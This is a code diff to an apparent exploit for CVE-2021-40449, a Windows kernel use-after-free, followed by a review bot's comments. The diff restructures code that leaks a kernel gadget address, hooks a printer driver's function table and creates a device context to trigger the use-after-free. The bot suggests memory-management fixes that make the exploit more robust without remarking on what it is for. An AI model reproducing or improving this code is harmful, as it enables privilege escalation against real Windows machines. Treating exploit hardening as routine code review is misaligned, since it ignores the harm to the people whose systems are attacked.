■ ■ ■ ■ ■ ■
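--- a/CVE-2021-40449/exploit.cpp
+++ b/CVE-2021-40449/exploit.cpp
@@ -35,9 +35,7 @@
 rtlSetAllBits_address = leak_gadget_address();
 cout << "rtlSetAllBits() on ring0 @ 0x" << hex << rtlSetAllBits_address << endl;
 
-setup_hook();
-
-if (!(uaf_hdc = CreateDCW(NULL, hooked_printer_name, NULL, NULL)))
+if (!setup_hook())
 goto error;
 
 uaf = TRUE;
@@ -51,6 +49,7 @@
 
 error:
 cout << "error @ main()" << endl;
+system("pause");
 return 1;
 }
 
@@ -160,7 +159,7 @@
 goto error;
 return (DWORD64)drivers[0];
 error:
-cout << "[!] error @ leak_kernel_base_address()" << endl;
+cout << "[!] error @ leak_module_base_kernel()" << endl;
 return FALSE;
 }
 
@@ -310,10 +309,13 @@
 DrvDisableDriver();
 if (!VirtualProtect(DRVENABLEDATA_ptr.pdrvfn, DRVENABLEDATA_ptr.c * sizeof(PFN), lpflOldProtect, &lpflOldProtect))
 goto error;
-
+uaf_hdc = CreateDCW(NULL, hooked_printer_name, NULL, NULL);
+if (uaf_hdc) {
+return TRUE;
+}
 LocalFree((HLOCAL)printers);
 LocalFree((HLOCAL)driver_info);
-return TRUE;
+
 }
 error:
 printers&& LocalFree((HLOCAL)printers);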
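Review bot: In the last hunk (new lines 312–318) the added `if (uaf_hdc) { return TRUE; }` returns before the two `LocalFree` calls, so `printers` and `driver_info` are never released on the success path. On the failure path both buffers are freed and control then leaves the block towards the `error:` label, where `printers&& LocalFree((HLOCAL)printers);` appears to release the same pointer a second time because it is never cleared. The function's start and the rest of its cleanup are outside the hunk, so this is inferred from the visible lines; if it holds, clear the pointers after freeing, e.g. `LocalFree((HLOCAL)printers); printers = NULL;` and likewise for `driver_info`, and run that cleanup before the `return TRUE` as well, provided `hooked_printer_name` does not point into either buffer. Separately, the added `system("pause");` in main's error path starts a command interpreter only to wait for a key press; `cin.get();` waits the same way without spawning a process.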